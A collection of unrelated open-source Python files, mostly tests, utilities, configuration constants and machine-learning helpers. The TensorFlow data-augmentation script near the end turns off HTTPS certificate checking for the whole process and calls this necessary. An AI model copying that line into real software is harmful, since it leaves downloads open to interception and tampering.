self.assertEqual(
Processor.known_extension('https://wpt.fyi/test.txt'), '.txt')
self.assertEqual(
Processor.known_extension('artifact.zip'), '.zip')
def test_download(self):
with Processor() as p:
p._download_gcs = self.fake_download(
'gs://wptd/foo/bar.json', '/fake/bar.json')
p._download_http = self.fake_download(
'https://wpt.fyi/test.txt.gz', '/fake/test.txt.gz')
p.download(
['gs://wptd/foo/bar.json'],
['https://wpt.fyi/test.txt.gz'],
None)
self.assertListEqual(p.results, ['/fake/bar.json'])
self.assertListEqual(p.screenshots, ['/fake/test.txt.gz'])
def test_download_azure(self):
with Processor() as p:
p._download_gcs = self.fake_download(None, None)
p._download_http = self.fake_download(
'https://wpt.fyi/artifact.zip', 'artifact_test.zip')
p.download([], [], 'https://wpt.fyi/artifact.zip')
self.assertEqual(len(p.results), 2)
self.assertTrue(p.results[0].endswith(
'/artifact_test/wpt_report_1.json'))
self.assertTrue(p.results[1].endswith(
'/artifact_test/wpt_report_2.json'))
self.assertEqual(len(p.screenshots), 2)
self.assertTrue(p.screenshots[0].endswith(
'/artifact_test/wpt_screenshot_1.txt'))
self.assertTrue(p.screenshots[1].endswith(
'/artifact_test/wpt_screenshot_2.txt'))
def test_download_azure_errors(self):
with Processor() as p:
p._download_gcs = self.fake_download(None, None)
p._download_http = self.fake_download(
'https://wpt.fyi/artifact.zip', None)
# Incorrect param combinations (both results & azure_url):
with self.assertRaises(AssertionError):
p.download(['https://wpt.fyi/test.json.gz'],
[],
'https://wpt.fyi/artifact.zip')
# Download failure: no exceptions should be raised.
p.download([], [], 'https://wpt.fyi/artifact.zip')
self.assertEqual(len(p.results), 0)
class MockProcessorTest(unittest.TestCase):
@patch('processor.Processor')
def test_params_plumbing_success(self, MockProcessor):
# Set up mock context manager to return self.
mock = MockProcessor.return_value
mock.__enter__.return_value = mock
mock.check_existing_run.return_value = False
mock.results = ['/tmp/wpt_report.json.gz']
mock.raw_results_url = 'https://wpt.fyi/test/report.json'
mock.results_url = 'https://wpt.fyi/test'
mock.test_run_id = 654321
# NOTE: if you need to change the following params, you probably also
# want to change api/receiver/api.go.
params = MultiDict({
'uploader': 'blade-runner',
'id': '654321',
'callback_url': 'https://test.wpt.fyi/api',
'labels': 'foo,bar',
'results': 'https://wpt.fyi/wpt_report.json.gz',
'browser_name': 'Chrome',
'browser_version': '70',
'os_name': 'Linux',
'os_version': '5.0',
'revision': '21917b36553562d21c14fe086756a57cbe8a381b',
})
process_report('12345', params)
mock.assert_has_calls([
call.update_status('654321', 'WPTFYI_PROCESSING', None,
'https://test.wpt.fyi/api'),
call.download(['https://wpt.fyi/wpt_report.json.gz'], [], None),
])
mock.report.update_metadata.assert_called_once_with(
revision='21917b36553562d21c14fe086756a57cbe8a381b',
browser_name='Chrome', browser_version='70',
os_name='Linux', os_version='5.0')
mock.create_run.assert_called_once_with(
'654321', 'foo,bar', 'blade-runner', 'https://test.wpt.fyi/api')
@patch('processor.Processor')
def test_params_plumbing_error(self, MockProcessor):
# Set up mock context manager to return self.
mock = MockProcessor.return_value
mock.__enter__.return_value = mock
mock.results = ['/tmp/wpt_report.json.gz']
mock.load_report.side_effect = wptreport.InvalidJSONError
params = MultiDict({
'uploader': 'blade-runner',
'id': '654321',
'results': 'https://wpt.fyi/wpt_report.json.gz',
})
# Suppress print_exception.
with patch('traceback.print_exception'):
process_report('12345', params)
mock.assert_has_calls([
call.update_status('654321', 'WPTFYI_PROCESSING', None, None),
call.download(['https://wpt.fyi/wpt_report.json.gz'], [], None),
call.load_report(),
call.update_status(
'654321', 'INVALID',
"Invalid JSON (['https://wpt.fyi/wpt_report.json.gz'])", None),
])
mock.create_run.assert_not_called()
@patch('processor.Processor')
def test_params_plumbing_empty(self, MockProcessor):
# Set up mock context manager to return self.
mock = MockProcessor.return_value
mock.__enter__.return_value = mock
mock.results = []
params = MultiDict({
'uploader': 'blade-runner',
'id': '654321',
})
with self.assertLogs():
process_report('12345', params)
mock.assert_has_calls([
call.update_status('654321', 'WPTFYI_PROCESSING', None, None),
call.download([], [], None),
call.update_status('654321', 'EMPTY', None, None),
])
mock.create_run.assert_not_called()
@patch('processor.Processor')
def test_params_plumbing_duplicate(self, MockProcessor):
# Set up mock context manager to return self.
mock = MockProcessor.return_value
mock.__enter__.return_value = mock
mock.check_existing_run.return_value = True
mock.results = ['/tmp/wpt_report.json.gz']
mock.raw_results_url = 'https://wpt.fyi/test/report.json'
params = MultiDict({
'uploader': 'blade-runner',
'id': '654321',
'results': 'https://wpt.fyi/wpt_report.json.gz',
})
with self.assertLogs():
process_report('12345', params)
mock.update_status.assert_has_calls([
call('654321', 'WPTFYI_PROCESSING', None, None),
call('654321', 'DUPLICATE', None, None),
])
mock.create_run.assert_not_called()
class ProcessorDownloadServerTest(unittest.TestCase):
"""This class tests behaviours of Processor related to downloading
artifacts (e.g. JSON reports) from an external server. test_server is used
to emulate the success and failure modes of an external server.
"""
def setUp(self):
self.server, self.url = test_util.start_server(False)
def tearDown(self):
self.server.terminate()
self.server.wait()
def test_download_single(self):
with Processor() as p:
# The endpoint returns "Hello, world!".
path = p._download_single(self.url + '/download/test.txt')
self.assertTrue(path.endswith('.txt'))
with open(path, 'rb') as f:
self.assertEqual(f.read(), b'Hello, world!')
def test_download(self):
with Processor() as p:
p.TIMEOUT_WAIT = 0.1 # to speed up tests
url_404 = self.url + '/404'
url_timeout = self.url + '/slow'
with self.assertLogs() as lm:
p.download(
[self.url + '/download/test.txt', url_timeout],
[url_404],
None)
self.assertEqual(len(p.results), 1)
self.assertTrue(p.results[0].endswith('.txt'))
self.assertEqual(len(p.screenshots), 0)
self.assertListEqual(
lm.output,
['ERROR:processor:Timed out fetching: ' + url_timeout,
'ERROR:processor:Failed to fetch (404): ' + url_404])
def test_download_content_disposition(self):
with Processor() as p:
# The response of this endpoint sets Content-Disposition with
# artifact_test.zip as the filename.
path = p._download_single(self.url + '/download/attachment')
self.assertTrue(path.endswith('.zip'))
class ProcessorAPIServerTest(unittest.TestCase):
"""This class tests API calls from Processor to webapp (e.g.
/api/results/create, /api/status). test_server is used to emulate webapp
and verify credentials and payloads.
"""
def setUp(self):
self.server, self.url = test_util.start_server(True)
def tearDown(self):
if self.server.poll() is None:
self.server.kill()
def test_update_status(self):
with Processor() as p:
p._auth = AUTH_CREDENTIALS
p.report.update_metadata(
browser_name='Chrome',
browser_version='70',
os_name='Linux',
os_version='5.0',
revision='21917b36553562d21c14fe086756a57cbe8a381b')
p.update_status(
run_id='12345', stage='INVALID',
error='Sample error', callback_url=self.url)
self.server.terminate()
_, err = self.server.communicate()
response = json.loads(err)
self.assertDictEqual(response, {
'id': 12345, 'stage': 'INVALID', 'error': 'Sample error',
'browser_name': 'Chrome', 'browser_version': '70',
'os_name': 'Linux', 'os_version': '5.0',
'full_revision_hash': '21917b36553562d21c14fe086756a57cbe8a381b',
})
def test_create_run(self):
api = self.url + '/api/results/create'
with Processor() as p:
p._auth = AUTH_CREDENTIALS
p.report.update_metadata(
browser_name='chrome',
browser_version='70',
os_name='Linux',
revision='21917b36553562d21c14fe086756a57cbe8a381b')
p.create_run('12345', '', 'blade-runner', callback_url=api)
# p.test_run_id is set based on the response from the API, which in
# turn is set according to the request. Hence this verifies that we
# pass the run ID to the API correctly.
self.assertEqual(p.test_run_id, 12345)
self.server.terminate()
# This is needed to close the stdio pipes.
self.server.communicate()
|
bin/evaluate-dataset-Adult.py
|
e-orlov/autosklearn-zeroconf
| 176 |
115991
|
<reponame>e-orlov/autosklearn-zeroconf
# -*- coding: utf-8 -*-
"""
Copyright 2017 <NAME>
Created on Sun Apr 23 11:52:59 2017
@author: ekobylkin
This is an example on how to prepare data for autosklearn-zeroconf.
It is using a well known Adult (Salary) dataset from UCI https://archive.ics.uci.edu/ml/datasets/Adult .
"""
import pandas as pd
test = pd.read_csv(filepath_or_buffer='./data/adult.test.withid',sep=',', error_bad_lines=False, index_col=False)
#print(test)
prediction = pd.read_csv(filepath_or_buffer='./data/zeroconf-result.csv',sep=',', error_bad_lines=False, index_col=False)
#print(prediction)
df=pd.merge(test, prediction, how='inner', on=['cust_id',])
y_test=df['category']
y_hat=df['prediction']
from sklearn.metrics import (confusion_matrix, precision_score
, recall_score, f1_score, accuracy_score)
from time import time,sleep,strftime
def p(text):
for line in str(text).splitlines():
print ('[ZEROCONF] '+line+" # "+strftime("%H:%M:%S")+" #")
p("\n")
p("#"*72)
p("Accuracy score {0:2.0%}".format(accuracy_score(y_test, y_hat)))
p("The below scores are calculated for predicting '1' category value")
p("Precision: {0:2.0%}, Recall: {1:2.0%}, F1: {2:.2f}".format(
precision_score(y_test, y_hat),recall_score(y_test, y_hat),f1_score(y_test, y_hat)))
p("Confusion Matrix: https://en.wikipedia.org/wiki/Precision_and_recall")
p(confusion_matrix(y_test, y_hat))
baseline_1 = str(sum(a for a in y_test))
baseline_all = str(len(y_test))
baseline_prcnt = "{0:2.0%}".format( float(sum(a for a in y_test)/len(y_test)))
p("Baseline %s positives from %s overall = %1.1f%%" %
(sum(a for a in y_test), len(y_test), 100*sum(a for a in y_test)/len(y_test)))
p("#"*72)
p("\n")
|
pipeline/python/ion/reports/plotKey.py
|
konradotto/TS
| 125 |
115992
|
# Copyright (C) 2010 Ion Torrent Systems, Inc. All Rights Reserved
import os
from ion.reports.plotters import plotters
from numpy import median
class KeyPlot:
def __init__(self, key, floworder, title=None):
self.data = None
self.key = key
self.floworder = floworder
self.title = title
self.average_peak = None
def plot(self, outdir=os.getcwd()):
expected = [1 for i in range(len(self.key) - 1)]
tracePlot = plotters.Iontrace(
self.key,
expected,
self.data,
title="Consensus Key 1-Mer - %s Ave. Peak = %s"
% (self.title, self.average_peak),
)
tracePlot.render()
tracePlot.save(
os.path.join(outdir, "iontrace_%s" % self.title.replace(" ", "_"))
)
def parse(self, fileIn):
d = open(fileIn, "r")
data = d.readlines()
d.close()
trace = {}
max = None # max length needed to fill in null values
for line in data:
t = line.strip().split(" ")
fTrace = [float(i) for i in t[1:]]
trace[t[0]] = fTrace
if max < len(fTrace) or max == None:
max = len(fTrace)
toPlot = []
for k in self.key:
if k in list(trace.keys()):
toPlot.append(trace[k])
else:
toPlot.append([0 for i in range(max)])
self.data = trace
return toPlot
def dump_max(self, fileName):
try:
with open(fileName, "a") as f:
max_array = [
max(trace) for k, trace in list(self.data.items()) if k in self.key
]
self.average_peak = int(median(max_array)) if len(max_array) > 0 else 0
f.write("%s = %s\n" % (self.title, self.average_peak))
except Exception:
print("Can't open file")
if __name__ == "__main__":
libKey = sys.argv[2]
floworder = sys.argv[3]
fileIn = sys.argv[1]
fileOut = sys.argv[4]
kp = KeyPlot(libKey, floworder, "Test Fragment")
kp.parse(fileIn)
kp.dump_max(fileOut)
kp.plot()
|
retail-of-the-future-demo/IgniteSolution/modules/CameraStream/camera-stream/camera.py
|
piyushka17/azure-intelligent-edge-patterns
| 176 |
115993
|
import cv2
import os, logging, time, json
import requests, base64
from flask import Flask, jsonify, request, Response
import numpy as np
# for HTTP/1.1 support
from werkzeug.serving import WSGIRequestHandler
app = Flask(__name__)
logging.basicConfig(format='%(asctime)s %(levelname)-10s %(message)s', datefmt="%Y-%m-%d-%H-%M-%S",
level=logging.INFO)
def main():
pass
def grab_image_from_stream():
repeat = 3
wait = 3
frame = None
for _ in range(repeat):
try:
video_capture = cv2.VideoCapture(args.camera)
video_capture.set(cv2.CAP_PROP_BUFFERSIZE, 1)
frame = video_capture.read()[1]
break
except:
# try to re-capture the stream
logging.info("Could not capture video. Recapturing and retrying...")
time.sleep(wait)
if frame is None:
logging.info("Failed to capture frame, sending blank image")
frame = np.zeros((300, 300, 3))
return frame
@app.route('/image/700')
def video_image():
frame = grab_image_from_stream()
_, jpeg = cv2.imencode('.jpg', frame)
response = Response(jpeg.tobytes(), headers={"content-length": len(jpeg)}, mimetype="image/jpeg")
return response
@app.route('/image/800')
def video_image_and_inference():
frame = grab_image_from_stream()
frame = cv2.resize(frame, (300, 300))
_, jpeg = cv2.imencode('.jpg', frame)
resp_img = jpeg.tobytes()
scoring_url = "http://grocerymodel:5001/score"
json_img = json.dumps({"img": frame.tolist()})
input_data = json_img
headers = {'Content-Type':'application/json'}
resp = requests.post(scoring_url, input_data, headers=headers)
logging.info(f'received response: {resp.status_code}')
resp_json = json.loads(resp.content)
resp_json["img"] = str(base64.b64encode(resp_img), "utf-8")
return jsonify(resp_json)
def start_app():
# set protocol to 1.1 so we keep the connection open
WSGIRequestHandler.protocol_version = "HTTP/1.1"
if args.fast:
logging.info("Running the `fast` version")
app.run(host="0.0.0.0", port=args.port)
else:
logging.info(f"Staring regular inventory cam. Port: {args.port}")
app.run(debug=False)
if __name__ == "__main__":
from cmdline import cmd_args
args = cmd_args.parse_camera_args()
if not args.fast:
app.config['SERVER_NAME'] = f'inventorycam:{args.port}'
if args.debug:
logging.info("Please attach a debugger to port 5678")
import ptvsd
ptvsd.enable_attach(('0.0.0.0', 5681))
ptvsd.wait_for_attach()
ptvsd.break_into_debugger()
start_app()
|
main/neigh_samplers.py
|
RuYunW/Graph2Seq-master
| 210 |
116005
|
from layers import Layer
import tensorflow as tf
class UniformNeighborSampler(Layer):
"""
Uniformly samples neighbors.
Assumes that adj lists are padded with random re-sampling
"""
def __init__(self, adj_info, **kwargs):
super(UniformNeighborSampler, self).__init__(**kwargs)
self.adj_info = adj_info
def _call(self, inputs):
ids, num_samples = inputs
adj_lists = tf.nn.embedding_lookup(self.adj_info, ids)
adj_lists = tf.transpose(tf.transpose(adj_lists))
adj_lists = tf.slice(adj_lists, [0,0], [-1, num_samples])
return adj_lists
|
homeassistant/components/dnsip/const.py
|
MrDelik/core
| 30,023 |
116006
|
<reponame>MrDelik/core<gh_stars>1000+
"""Constants for dnsip integration."""
from homeassistant.const import Platform
DOMAIN = "dnsip"
PLATFORMS = [Platform.SENSOR]
CONF_HOSTNAME = "hostname"
CONF_RESOLVER = "resolver"
CONF_RESOLVER_IPV6 = "resolver_ipv6"
CONF_IPV4 = "ipv4"
CONF_IPV6 = "ipv6"
DEFAULT_HOSTNAME = "myip.opendns.com"
DEFAULT_IPV6 = False
DEFAULT_NAME = "myip"
DEFAULT_RESOLVER = "208.67.222.222"
DEFAULT_RESOLVER_IPV6 = "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b"
|
diagrams/k8s/podconfig.py
|
Shimpei-GANGAN/diagrams
| 17,037 |
116008
|
# This module is automatically generated by autogen.sh. DO NOT EDIT.
from . import _K8S
class _Podconfig(_K8S):
_type = "podconfig"
_icon_dir = "resources/k8s/podconfig"
class CM(_Podconfig):
_icon = "cm.png"
class Secret(_Podconfig):
_icon = "secret.png"
# Aliases
ConfigMap = CM
|
envi/qt/config.py
|
rnui2k/vivisect
| 716 |
116017
|
<reponame>rnui2k/vivisect<gh_stars>100-1000
'''
A widget for editing EnviConfig options.
'''
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import *
class EnviConfigOption:
def __init__(self, config, name, value):
self.econfig = config
self.ename = name
self.evalue = value
def setEnviValue(self, evalue):
self.evalue = evalue
self.econfig[self.ename] = evalue
class EnviConfigBool(EnviConfigOption,QCheckBox):
def __init__(self, config, name, value, parent=None):
QCheckBox.__init__(self, parent=parent)
EnviConfigOption.__init__(self, config, name, value)
self.toggled.connect(self.setEnviValue)
self.setChecked(value)
def parseEnviValue(self):
self.setEnviValue(self.isChecked())
class EnviConfigInt(EnviConfigOption,QLineEdit):
def __init__(self, config, name, value, parent=None):
QLineEdit.__init__(self, parent=parent)
EnviConfigOption.__init__(self, config, name, value)
self.editingFinished.connect(self.parseEnviValue)
valstr = str(value)
if value > 1024:
valstr = '0x%.8x' % value
self.setText(valstr)
def parseEnviValue(self):
self.setEnviValue(int(str(self.text()),0))
class EnviConfigString(EnviConfigOption,QLineEdit):
def __init__(self, config, name, value, parent=None):
QLineEdit.__init__(self, parent=parent)
EnviConfigOption.__init__(self, config, name, value)
self.editingFinished.connect(self.parseEnviValue)
self.setText(value)
def parseEnviValue(self):
self.setEnviValue(str(self.text()))
cfgtypes = {
int: EnviConfigInt,
str: EnviConfigString,
bool: EnviConfigBool,
}
class EnviConfigEditor(QWidget):
def __init__(self, config, parent=None):
QWidget.__init__(self, parent=parent)
self.enviconfig = config
lyt = QFormLayout()
optnames = list(config.keys())
optnames.sort()
for optname in optnames:
optval = config.get(optname)
cls = cfgtypes.get(type(optval))
if cls is None:
continue
label = QLabel(optname)
clsobj = cls(config, optname, optval, parent=self)
doc = config.getOptionDoc(optname)
if doc is not None:
label.setToolTip(doc)
lyt.addRow(label, clsobj)
self.setLayout(lyt)
class EnviConfigTabs(QTabWidget):
'''
A widget for a multi-tab multi-config
editor view. Specify a list of (name,config)
tuples.
'''
def __init__(self, configs, parent=None):
QTabWidget.__init__(self, parent=parent)
for name,config in configs:
editor = EnviConfigEditor(config, parent=self)
self.addTab(editor, name)
|
data/transforms/utils.py
|
apple/ml-cvnets
| 209 |
116019
|
<reponame>apple/ml-cvnets<gh_stars>100-1000
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
from typing import Any
import numpy as np
def setup_size(size: Any, error_msg="Need a tuple of length 2"):
if isinstance(size, int):
return size, size
if isinstance(size, (list, tuple)) and len(size) == 1:
return size[0], size[0]
if len(size) != 2:
raise ValueError(error_msg)
return size
def intersect(box_a, box_b):
"""Computes the intersection between box_a and box_b"""
max_xy = np.minimum(box_a[:, 2:], box_b[2:])
min_xy = np.maximum(box_a[:, :2], box_b[:2])
inter = np.clip((max_xy - min_xy), a_min=0, a_max=np.inf)
return inter[:, 0] * inter[:, 1]
def jaccard_numpy(box_a: np.ndarray, box_b: np.ndarray):
"""
Computes the intersection of two boxes.
Args:
box_a (np.ndarray): Boxes of shape [Num_boxes_A, 4]
box_b (np.ndarray): Box osf shape [Num_boxes_B, 4]
Returns:
intersection over union scores. Shape is [box_a.shape[0], box_a.shape[1]]
"""
inter = intersect(box_a, box_b)
area_a = (box_a[:, 2] - box_a[:, 0]) * (box_a[:, 3] - box_a[:, 1]) # [A,B]
area_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1]) # [A,B]
union = area_a + area_b - inter
return inter / union # [A,B]
|
suplemon/modules/diff.py
|
johnmbaughman/suplemon
| 912 |
116043
|
<gh_stars>100-1000
# -*- encoding: utf-8
import difflib
from suplemon.suplemon_module import Module
class Diff(Module):
"""View a diff of the current file compared to it's on disk version."""
def run(self, app, editor, args):
curr_file = app.get_file()
curr_path = curr_file.get_path()
if not curr_path:
self.app.set_status("File hasn't been saved, can't show diff.")
return False
current_data = editor.get_data()
f = open(curr_path)
original_data = f.read()
f.close()
diff = self.get_diff(original_data, current_data)
if not diff:
self.app.set_status("The file in the editor and on disk are identical.")
return False
file = app.new_file()
file.set_name(curr_file.get_name() + ".diff")
file.set_data(diff)
app.switch_to_file(app.last_file_index())
def get_diff(self, a, b):
a = a.splitlines(1)
b = b.splitlines(1)
diff = difflib.unified_diff(a, b)
return "".join(diff)
module = {
"class": Diff,
"name": "diff",
}
|
cachebrowser/settings/development.py
|
zhenyihan/cachebrowser
| 1,206 |
116050
|
<gh_stars>1000+
from cachebrowser.settings.base import CacheBrowserSettings
class DevelopmentSettings(CacheBrowserSettings):
def set_defaults(self):
self.host = "0.0.0.0"
self.port = 8080
self.ipc_port = 9000
self.database = 'db.sqlite'
self.bootstrap_sources = [
{
'type': 'local',
'path': self.data_path('local_bootstrap.yaml')
},
{
'type': 'remote',
'url': 'http://localhost:3000/api',
}
]
def data_dir(self):
return 'cachebrowser/data'
|
tests/components/freedompro/test_init.py
|
MrDelik/core
| 30,023 |
116067
|
"""Freedompro component tests."""
import logging
from unittest.mock import patch
from homeassistant.components.freedompro.const import DOMAIN
from homeassistant.config_entries import ConfigEntryState
from tests.common import MockConfigEntry
LOGGER = logging.getLogger(__name__)
ENTITY_ID = f"{DOMAIN}.fake_name"
async def test_async_setup_entry(hass, init_integration):
"""Test a successful setup entry."""
entry = init_integration
assert entry is not None
state = hass.states
assert state is not None
async def test_config_not_ready(hass):
"""Test for setup failure if connection to Freedompro is missing."""
entry = MockConfigEntry(
domain=DOMAIN,
title="Feedompro",
unique_id="0123456",
data={
"api_key": "<KEY>",
},
)
with patch(
"homeassistant.components.freedompro.get_list",
return_value={
"state": False,
},
):
entry.add_to_hass(hass)
await hass.config_entries.async_setup(entry.entry_id)
assert entry.state == ConfigEntryState.SETUP_RETRY
async def test_unload_entry(hass, init_integration):
"""Test successful unload of entry."""
entry = init_integration
assert len(hass.config_entries.async_entries(DOMAIN)) == 1
assert entry.state == ConfigEntryState.LOADED
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.state == ConfigEntryState.NOT_LOADED
|
test/hlt/pytest/python/com/huawei/iotplatform/client/dto/ServiceCapabilityDTO.py
|
yuanyi-thu/AIOT-
| 128 |
116089
|
from com.huawei.iotplatform.client.dto.ServiceCommand import ServiceCommand
from com.huawei.iotplatform.client.dto.ServiceProperty import ServiceProperty
class ServiceCapabilityDTO(object):
commands = ServiceCommand()
properties = ServiceProperty()
def __init__(self):
self.serviceId = None
self.serviceType = None
self.option = None
self.description = None
def getServiceId(self):
return self.serviceId
def setServiceId(self, serviceId):
self.serviceId = serviceId
def getServiceType(self):
return self.serviceType
def setServiceType(self, serviceType):
self.serviceType = serviceType
def getOption(self):
return self.option
def setOption(self, option):
self.option = option
def getDescription(self):
return self.description
def setDescription(self, description):
self.description = description
def getCommands(self):
return self.commands
def setCommands(self, commands):
self.commands = commands
def getProperties(self):
return self.properties
def setProperties(self, properties):
self.properties = properties
|
matminer/featurizers/site/external.py
|
ncfrey/matminer
| 326 |
116138
|
<gh_stars>100-1000
"""
Site featurizers requiring external libraries for core functionality.
"""
from monty.dev import requires
from pymatgen.io.ase import AseAtomsAdaptor
from sklearn.exceptions import NotFittedError
from pymatgen.core import Structure
from matminer.featurizers.base import BaseFeaturizer
# SOAPFeaturizer
try:
import dscribe
from dscribe.descriptors import SOAP as SOAP_dscribe
except ImportError:
dscribe, SOAP_dscribe = None, None
class SOAP(BaseFeaturizer):
"""
Smooth overlap of atomic positions (interface via DScribe).
Class for generating a partial power spectrum from Smooth Overlap of Atomic
Orbitals (SOAP). This implementation uses real (tesseral) spherical
harmonics as the angular basis set and provides two orthonormalized
alternatives for the radial basis functions: spherical primitive gaussian
type orbitals ("gto") or the polynomial basis set ("polynomial"). By
default the faster gto-basis is used. Please see the DScribe SOAP
documentation for more details.
Note that SOAP is only featurized for elements identified by "fit" (see
following), thus "fit" must be called before "featurize", or else an error
will be raised.
Based originally on the following publications:
"On representing chemical environments, <NAME>, <NAME>, and <NAME>, Phys. Rev. B 87, 184115, (2013),
https://doi.org/10.1103/PhysRevB.87.184115
"Comparing molecules and solids across structural and alchemical
space", <NAME>, <NAME>, <NAME> and <NAME>,
Phys. Chem. Chem. Phys. 18, 13754 (2016),
https://doi.org/10.1039/c6cp00415f
Implementation (and some documentation) originally based on DScribe:
https://github.com/SINGROUP/dscribe.
"DScribe: Library of descriptors for machine learning in materials science",
<NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>.
Computer Physics Communications, 106949 (2019),
https://doi.org/10.1016/j.cpc.2019.106949
Args:
rcut (float): A cutoff for local region in angstroms. Should be
bigger than 1 angstrom.
nmax (int): The number of radial basis functions.
lmax (int): The maximum degree of spherical harmonics.
sigma (float): The standard deviation of the gaussians used to expand the
atomic density.
rbf (str): The radial basis functions to use. The available options are:
* "gto": Spherical gaussian type orbitals defined as :math:`g_{nl}(r) = \sum_{n'=1}^{n_\mathrm{max}}\,\\beta_{nn'l} r^l e^{-\\alpha_{n'l}r^2}`
* "polynomial": Polynomial basis defined as :math:`g_{n}(r) = \sum_{n'=1}^{n_\mathrm{max}}\,\\beta_{nn'} (r-r_\mathrm{cut})^{n'+2}`
periodic (bool): Determines whether the system is considered to be
periodic.
crossover (bool): Determines if crossover of atomic types should
be included in the power spectrum. If enabled, the power
spectrum is calculated over all unique species combinations Z
and Z'. If disabled, the power spectrum does not contain
cross-species information and is only run over each unique
species Z. Turned on by default to correspond to the original
definition
"""
@requires(
dscribe,
"SOAPFeaturizer requires DScribe. Install from github.com/SINGROUP/dscribe",
)
def __init__(
self,
rcut,
nmax,
lmax,
sigma,
periodic,
rbf="gto",
crossover=True,
):
self.rcut = rcut
self.nmax = nmax
self.lmax = lmax
self.sigma = sigma
self.rbf = rbf
self.periodic = periodic
self.crossover = crossover
self.adaptor = AseAtomsAdaptor()
self.length = None
self.atomic_numbers = None
self.soap = None
self.n_elements = None
@classmethod
def from_preset(cls, preset):
"""
Create a SOAP featurizer object from sensible or published presets.
Args:
preset (str): Choose from:
"formation energy": Preset used for formation energy prediction
in the original Dscribe paper.
Returns:
"""
valid_presets = ["formation_energy"]
if preset == "formation_energy":
return cls(6, 8, 8, 0.4, True, "gto", True)
else:
raise ValueError(f"'{preset}' is not a valid preset. Choose from {valid_presets}")
def _check_fitted(self):
if not self.soap:
raise NotFittedError("Please fit SOAP before featurizing.")
def fit(self, X, y=None):
"""
Fit the SOAP featurizer to a dataframe.
Args:
X ([SiteCollection]): For example, a list of pymatgen Structures.
y : unused (added for consistency with overridden method signature)
Returns:
self
"""
# Check that pymatgen.Structures are provided
if not all([isinstance(struct, Structure) for struct in X]):
raise TypeError("This fit requires an array-like input of Pymatgen " "Structures and sites!")
elements = set()
for s in X:
c = s.composition.elements
for e in c:
if e.Z not in elements:
elements.add(e.Z)
self.elements_sorted = sorted(list(elements))
self.atomic_numbers = elements
self.soap = SOAP_dscribe(
species=self.atomic_numbers,
rcut=self.rcut,
nmax=self.nmax,
lmax=self.lmax,
sigma=self.sigma,
rbf=self.rbf,
periodic=self.periodic,
crossover=self.crossover,
average="off",
sparse=False,
)
self.length = self.soap.get_number_of_features()
return self
def featurize(self, struct, idx):
self._check_fitted()
s_ase = self.adaptor.get_atoms(struct)
return self.soap.create(s_ase, positions=[idx], n_jobs=self.n_jobs).tolist()[0]
def feature_labels(self):
self._check_fitted()
return [f"SOAP_{i}" for i in range(self.length)]
def citations(self):
return [
"@article{PhysRevB.87.184115,"
"title = {On representing chemical environments},"
"author = {Bart'ok, <NAME>. and <NAME> and Cs'anyi, "
"G'abor},"
"journal = {Phys. Rev. B},"
"volume = {87},"
"issue = {18},"
"pages = {184115},"
"numpages = {16},"
"year = {2013},"
"month = {May},"
"publisher = {American Physical Society},"
"doi = {10.1103/PhysRevB.87.184115},"
"url = {https://link.aps.org/doi/10.1103/PhysRevB.87.184115}}",
"@Article{C6CP00415F,"
"author ={<NAME> Bartók, <NAME>. and Csányi, Gábor"
" and Ceriotti, Michele},"
"title ={Comparing molecules and solids across structural and "
"alchemical space},"
"journal = {Phys. Chem. Chem. Phys.},"
"year = {2016},"
"volume = {18},"
"issue = {20},"
"pages = {13754-13769},"
"publisher = {The Royal Society of Chemistry},"
"doi = {10.1039/C6CP00415F},"
"url = {http://dx.doi.org/10.1039/C6CP00415F},}",
"@article{dscribe, "
'author = {<NAME> and J{"a}ger, <NAME>. and '
"Morooka, <NAME>. and <NAME>, Filippo and Ranawat, "
"<NAME>. and Gao, <NAME>. and Rinke, Patrick and Foster, "
"<NAME>.}, "
"title = {{DScribe: Library of descriptors for machine "
"learning in materials science}}, "
"journal = {Computer Physics Communications}, "
"year = {2019}, pages = {106949}, "
"doi = {https://doi.org/10.1016/j.cpc.2019.106949}}",
]
def implementors(self):
return ["<NAME> and the DScribe team", "<NAME>"]
|
codes/python/basics_in_machine_learning/dataaugmentation.py
|
agnes-yang/TensorFlow-Course
| 7,040 |
116150
|
<filename>codes/python/basics_in_machine_learning/dataaugmentation.py
# -*- coding: utf-8 -*-
"""dataaugmentation.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ibfKtpxC_hIhZlPbefCoqpAS7jTdyiFw
"""
import tensorflow as tf
import tensorflow_datasets as tfds # Import TensorFlow datasets
import urllib
import tensorflow_datasets as tfds
import matplotlib.pyplot as plt
import numpy as np
# Necessary for dealing with https urls
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
# We read only the first 10 training samples
ds, ds_info = tfds.load('colorectal_histology', split='train', shuffle_files=True, with_info=True, download=True)
assert isinstance(ds, tf.data.Dataset)
print(ds_info)
# Visualizing images
fig = tfds.show_examples(ds, ds_info)
# Reading all images (remove break point to read all)
for example in tfds.as_numpy(ds):
image, label = example['image'], example['label']
break
# take one sample from data
one_sample = ds.take(1)
one_sample = list(one_sample.as_numpy_iterator())
image = one_sample[0]['image']
label = one_sample[0]['label']
print(image.shape,label.shape)
# Side by side visualization
def visualize(im, imAgmented, operation):
fig = plt.figure()
plt.subplot(1,2,1)
plt.title('Original image')
plt.imshow(im)
plt.subplot(1,2,2)
plt.title(operation)
plt.imshow(imAgmented)
# Adding Gaussian noise to image
common_type = tf.float32 # Make noise and image of the same type
gnoise = tf.random.normal(shape=tf.shape(image), mean=0.0, stddev=0.1, dtype=common_type)
image_type_converted = tf.image.convert_image_dtype(image, dtype=common_type, saturate=False)
noisy_image = tf.add(image_type_converted, gnoise)
visualize(image_type_converted, noisy_image, 'noisyimage')
# Adjusting brighness
bright = tf.image.adjust_brightness(image, 0.2)
visualize(image, bright, 'brightened image')
# Flip image
flipped = tf.image.flip_left_right(image)
visualize(image, flipped, 'flipped image')
adjusted = tf.image.adjust_jpeg_quality(image, jpeg_quality=20)
visualize(image, adjusted, 'quality adjusted image')
# Randon cropping of the image (the cropping area is picked at random)
crop_to_original_ratio = 0.5 # The scale of the cropped area to the original image
new_size = int(crop_to_original_ratio * image.shape[0])
